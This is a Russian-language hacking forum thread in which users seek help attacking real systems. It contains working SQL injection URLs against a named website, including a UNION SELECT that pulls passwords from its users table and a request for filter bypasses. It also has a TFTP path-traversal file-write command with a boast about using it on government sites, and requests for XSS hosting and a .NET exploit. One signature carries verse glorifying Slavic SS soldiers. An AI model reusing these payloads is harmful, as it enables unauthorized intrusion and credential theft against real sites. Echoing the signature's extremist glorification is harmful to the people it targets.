
20.11.2009, 01:23
|
|
Новичок
Регистрация: 19.11.2009
Сообщений: 1
С нами:
8671999
Репутация:
0
|
|
Всем привет,
2 вопроса
1. Бесплатный хостинг для XSS и
2. сканер XSS багов на сайте.
Прошу помочь. Благодарен Axelhack.
|
|
|

20.11.2009, 07:44
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Подскажите, сканер выплюнул:
С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.
В сервисе TFTP на 69 udp порту. Впервые такую фичу фичу вижу,объясните как реализовывать?
ФТП может висеть на удп? если да,то как приконектиться?
Последний раз редактировалось p.r0phe.t; 20.11.2009 в 07:56..
|
|
|

20.11.2009, 15:00
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
С нами:
8730155
Репутация:
-1
|
|
Сообщение от p.r0phe.t
Подскажите, сканер выплюнул:
С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.
Ты бы хоть нумеровал свои ошибки чтоли).а команда PUT тут имеется в виду Метод PUT протокола НТТР.Нарули в гугле синтаксис и лей,че хошь).На паре гов сайтов у мя давным-давно такое прокатило.Пробовал,правда, ить ток тхт файлы).Редкая довольно-таки вещь.
|
|
|

20.11.2009, 15:25
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Сообщение от GenTao
Ты бы хоть нумеровал свои ошибки чтоли).а команда PUT тут имеется в виду Метод PUT протокола НТТР.Нарули в гугле синтаксис и лей,че хошь).На паре гов сайтов у мя давным-давно такое прокатило.Пробовал,правда, ить ток тхт файлы).Редкая довольно-таки вещь.
В сервисе TFTP на 69 udp порту.
Причём тут ХТТП? оО
Какие ошибки нумеровать? ты о чём?
|
|
|

21.11.2009, 03:56
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
С нами:
8730155
Репутация:
-1
|
|
Сообщение от p.r0phe.t
В сервисе TFTP на 69 udp порту.
Причём тут ХТТП? оО
Какие ошибки нумеровать? ты о чём?
Я думал,у тебядве ощибки вместе было(про тфтп и эту хрень).Значит,у меня было что-то другое.Без скрина всё равно не пойму).
|
|
|

20.11.2009, 10:21
|
|
Новичок
Регистрация: 10.01.2007
Сообщений: 16
С нами:
10174902
Репутация:
2
|
|
кто может подсказать по скуле в
http://www.pngbd.com/photos/showgallery.php?cat=1'
Никак не выходит, толи поля не подпираются, толи фильтр какой-то
|
|
|

20.11.2009, 10:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
тебе там подвох, что в ошибке не показывает запрос ((и это не есть гуд
почему я подумал про скобку )))
http://www.pngbd.com/photos/showgallery.php?cat=1')+UNION+SELECT+1,version(),3 ,4%23
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|

20.11.2009, 10:33
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
есть ли у кого нибудь эксплойт на Microsoft .NET Framework Version:2.0.50727 Никак не могу найти
|
|
|

21.11.2009, 11:52
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
цитирую
Сообщение от YuNi|[c
есть ли у кого нибудь эксплойт на Microsoft .NET Framework Version:2.0.50727 Никак не могу найти
|
|
|

20.11.2009, 16:40
|
|
Новичок
Регистрация: 10.01.2007
Сообщений: 16
С нами:
10174902
Репутация:
2
|
|
http://www.pngbd.com/photos/showgallery.php?cat=999%27%29+UNION+SELECT+1,passw ord,3,4+from+matryx_photos.users%23
видимо стоят фильтры на password,users итд есть идеи как обойти?
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|